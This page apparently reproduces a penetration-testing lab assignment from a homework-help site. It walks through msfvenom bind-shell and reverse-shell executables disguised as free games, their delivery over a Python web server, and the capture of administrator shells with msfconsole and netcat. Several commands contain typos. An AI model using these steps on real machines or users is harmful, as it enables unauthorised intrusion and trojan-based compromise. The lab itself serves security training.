Module Activity Description Part Zero Set Up Simplehttpsever On Your Kali Linux System Open A Terminal And Create A 1 (62.53 KiB) Viewed 59 times
Module Activity Description Part Zero Set Up Simplehttpsever On Your Kali Linux System Open A Terminal And Create A 2 (62.53 KiB) Viewed 59 times
Module Activity Description Part Zero Set Up Simplehttpsever On Your Kali Linux System Open A Terminal And Create A 3 (65.94 KiB) Viewed 59 times
Module Activity Description: Part Zero: Set up SimpleHTTPSever On your Kali Linux system: • Open a terminal and create a new directory mkdir /root/FreeGames Change into the new directory cd /root/FreeGames Start a simply http server with python python - SimpleHTTPServer 80 Leave this terminal window open throughout the rest of the lab. Module Activity Description: Part One: Creating a Bind Shell Binary A bind shell opens a new service on the target machine and requires the attacker to connect to it in order to get a session On your Kali Linux System: • Open a new terminal and type the following command msfvenom -p windows/meterpreter/bind_tCp -f exe > /root/FreeGames/BubbleBlast2020.exe On your Windows 7 system Open a web browser and browse to the IP address of your Kali System Click the link for BubbleBlash2000.exe and install NOTE: It should prompt you to allow this application through your firewall. This exploit does require the ability to make incoming connections through all firewalls on the network. On your Kali system open the msfconsole to get a session on the target system: msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/bind_top msf exploit(handler) > set RHOST <IP Address of Windows 7 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > exploit You should now have a meterpreter session to your Windows system. Type 'shell to access the system command prompt as an administrator.
Module Activity Description: Part Two: Create a Reverse TCP Shell Binary A reverse shell requires the attacker to setup a listener on their system before the attack is deployed. The target acts as a client connecting to that listener, and then the attacker receives the shell. We will use netcat as our listener in this example. On your Kali Linux system create a new payload with the following command: msfvenom -p windows/shell_reverse_tcp LHOST=<IP.of. Kali.System> LPORT-1111 -f exe > /root/FreeGames/GoldGrabber.exe • Open a netcat listening session nc -lvp 1111 • On your Windows 7 system, refresh your browser or reconnect to you Kali IP • Click the link for GoldGrabber.exe and install. • On your Kali Linux system, you will now see your netcat session has connected to the target's command line as an administrator. NOTE: Notice you were not prompted to open a port on the Firewall this time. This exploit creates a client connection, which should be able to bypass most firewalls. Module Activity Description: Part Three: Create Your Own Malicious Binaries Go through the extensive list of available payloads and create two malicious binaries of your own to get access to a target system. Feel free to try to exploit any system on your network (it does not have to be Windows 7).
Join a community of subject matter experts. Register for FREE to view solutions, replies, and use search function. Request answer by replying!